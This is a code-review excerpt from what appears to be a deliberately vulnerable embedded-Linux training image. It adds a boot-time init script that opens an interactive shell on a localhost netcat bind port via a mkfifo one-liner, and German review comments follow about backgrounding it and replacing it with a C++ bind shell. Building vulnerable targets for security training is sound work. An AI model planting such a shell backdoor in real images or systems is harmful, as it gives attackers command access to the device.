meta-hackypi/recipes-vulnerable/moodie-maggie/files/remote-shell.sh

```diff
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+### BEGIN INIT INFO
+# Provides:          remote-shell
+# Required-Start:
+# Required-Stop:
+# Default-Start:     5
+# Default-Stop:      0 6
+# Short-Description: Create a bind shell restricted to localhost
+### END INIT INFO
+
+start() {
+    mkfifo /tmp/f
+    (cat /tmp/f | /bin/sh -i 2>&1 | nc -nlvp 1818 -s 127.0.0.1 > /tmp/f)
```

Comment:
Muss noch so umgeschrieben werden, dass der Prozess zuverlässig im Hintergrund läuft

Reply:
https://unix.stackexchange.com/questions/86503/netcat-doesnt-work-as-expected-when-detached-from-console-with-nohup-ubuntu-de

Reply:
Es wurde nun eine eigene Bind Shell in C++ geschrieben, die das Problem löst.